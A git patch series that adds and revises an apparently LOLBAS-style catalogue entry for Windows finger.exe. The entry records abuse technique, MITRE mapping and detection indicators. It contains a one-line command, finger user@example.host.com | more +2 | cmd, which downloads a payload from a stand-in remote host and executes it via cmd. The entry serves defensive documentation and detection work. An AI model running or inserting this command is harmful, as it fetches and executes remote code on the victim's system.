From 670a5f18706ad1c58208d08cdda4387103f49f42 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Rub=C3=A9n?= Date: Mon, 30 Aug 2021 13:16:08 +0200 Subject: [PATCH 1/5] Create Finger.exe --- yml/OSBinaries/Finger.yml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 yml/OSBinaries/Finger.yml diff --git a/yml/OSBinaries/Finger.yml b/yml/OSBinaries/Finger.yml new file mode 100644 index 0000000..6c6c8eb --- /dev/null +++ b/yml/OSBinaries/Finger.yml @@ -0,0 +1,28 @@ +Name: Finger.exe +Description: Displays information about a user or users on a specified remote computer that is running the Finger service or daemon +Author: Ruben Revuelta +Created: 2021-08-30 +Commands: + - Command: finger user@example.host.com | more +2 | cmd + Description: Connects to "example.host.com" domain asking for the fake user "user" downloading as a result a malicious shellcode which is executed by cmd process. + Usecase: Download malicious shellcode from Command & Control server. + Category: Download + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/techniques/T1105 + OperatingSystem: From Windows Server 2008 and Windows 8 +Full_Path: + - Path: c:\windows\system32\finger.exe + - Path: c:\windows\syswow64\finger.exe +Code_Sample: + - Code: +Detection: + - IOC: finger.exe spawn is not common in client systems. + - IOC: finger.exe connecting to external resources. +Resources: + - Link: https://docs.microsoft.com/es-es/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961508(v=ws.11) +Acknowledgement: + - Person: Ruben Revuelta (MAPFRE CERT) + Handle: @rubn_RB + - Person: Jose A. Jimenez (MAPFRE CERT) + Handle: @Ocelotty6669 \ No newline at end of file From bb73c013fb4fa70995c7dc51e4b4a95a74e1675a Mon Sep 17 00:00:00 2001 From: Ruben Date: Mon, 30 Aug 2021 13:30:52 +0200 Subject: [PATCH 2/5] Update Finger.yml Fixed header and footer --- yml/OSBinaries/Finger.yml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/yml/OSBinaries/Finger.yml b/yml/OSBinaries/Finger.yml index 6c6c8eb..8f25c80 100644 --- a/yml/OSBinaries/Finger.yml +++ b/yml/OSBinaries/Finger.yml @@ -1,3 +1,4 @@ +--- Name: Finger.exe Description: Displays information about a user or users on a specified remote computer that is running the Finger service or daemon Author: Ruben Revuelta @@ -25,4 +26,5 @@ Acknowledgement: - Person: Ruben Revuelta (MAPFRE CERT) Handle: @rubn_RB - Person: Jose A. Jimenez (MAPFRE CERT) - Handle: @Ocelotty6669 \ No newline at end of file + Handle: @Ocelotty6669 +--- From afe93672a479e835727287813d1464b251252f70 Mon Sep 17 00:00:00 2001 From: Wietze Date: Mon, 25 Oct 2021 12:25:13 +0100 Subject: [PATCH 3/5] Minor updates --- yml/OSBinaries/Finger.yml | 17 +++++++++-------- 1 file changed, 9 insertions(+), 8 deletions(-) diff --git a/yml/OSBinaries/Finger.yml b/yml/OSBinaries/Finger.yml index 8f25c80..508258a 100644 --- a/yml/OSBinaries/Finger.yml +++ b/yml/OSBinaries/Finger.yml @@ -5,26 +5,27 @@ Author: Ruben Revuelta Created: 2021-08-30 Commands: - Command: finger user@example.host.com | more +2 | cmd - Description: Connects to "example.host.com" domain asking for the fake user "user" downloading as a result a malicious shellcode which is executed by cmd process. - Usecase: Download malicious shellcode from Command & Control server. + Description: 'Downloads payload from remote Finger server. This example connects to "example.host.com" asking for user "user"; the result could contain malicious shellcode which is executed by the cmd process.' + Usecase: Download malicious payload Category: Download Privileges: User MitreID: T1105 MitreLink: https://attack.mitre.org/techniques/T1105 - OperatingSystem: From Windows Server 2008 and Windows 8 + OperatingSystem: Windows 8.1, Windows 10, Windows 11, Windows Server 2008, Windows Server 2008R2, Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019, Windows Server 2022 Full_Path: - Path: c:\windows\system32\finger.exe - Path: c:\windows\syswow64\finger.exe -Code_Sample: - - Code: Detection: - - IOC: finger.exe spawn is not common in client systems. + - IOC: finger.exe should not be run on a normal workstation. - IOC: finger.exe connecting to external resources. Resources: + - Link: https://twitter.com/DissectMalware/status/997340270273409024 - Link: https://docs.microsoft.com/es-es/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961508(v=ws.11) Acknowledgement: - Person: Ruben Revuelta (MAPFRE CERT) - Handle: @rubn_RB + Handle: '@rubn_RB' - Person: Jose A. Jimenez (MAPFRE CERT) - Handle: @Ocelotty6669 + Handle: '@Ocelotty6669' + - Person: Malwrologist + Handle: '@DissectMalware' --- From 234eb99a7dd6f3a1da8ce80d70b9a1229e106c8a Mon Sep 17 00:00:00 2001 From: Wietze Date: Mon, 25 Oct 2021 12:27:00 +0100 Subject: [PATCH 4/5] Formatting --- yml/OSBinaries/Finger.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSBinaries/Finger.yml b/yml/OSBinaries/Finger.yml index 508258a..5a74c84 100644 --- a/yml/OSBinaries/Finger.yml +++ b/yml/OSBinaries/Finger.yml @@ -15,7 +15,7 @@ Commands: Full_Path: - Path: c:\windows\system32\finger.exe - Path: c:\windows\syswow64\finger.exe -Detection: +Detection: - IOC: finger.exe should not be run on a normal workstation. - IOC: finger.exe connecting to external resources. Resources: From eafc1982f061f9fc00d8b4d192bf7dd96c607a00 Mon Sep 17 00:00:00 2001 From: Wietze Date: Mon, 25 Oct 2021 12:28:09 +0100 Subject: [PATCH 5/5] Website update --- yml/OSBinaries/Finger.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSBinaries/Finger.yml b/yml/OSBinaries/Finger.yml index 5a74c84..b6ded95 100644 --- a/yml/OSBinaries/Finger.yml +++ b/yml/OSBinaries/Finger.yml @@ -20,7 +20,7 @@ Detection: - IOC: finger.exe connecting to external resources. Resources: - Link: https://twitter.com/DissectMalware/status/997340270273409024 - - Link: https://docs.microsoft.com/es-es/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961508(v=ws.11) + - Link: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961508(v=ws.11) Acknowledgement: - Person: Ruben Revuelta (MAPFRE CERT) Handle: '@rubn_RB'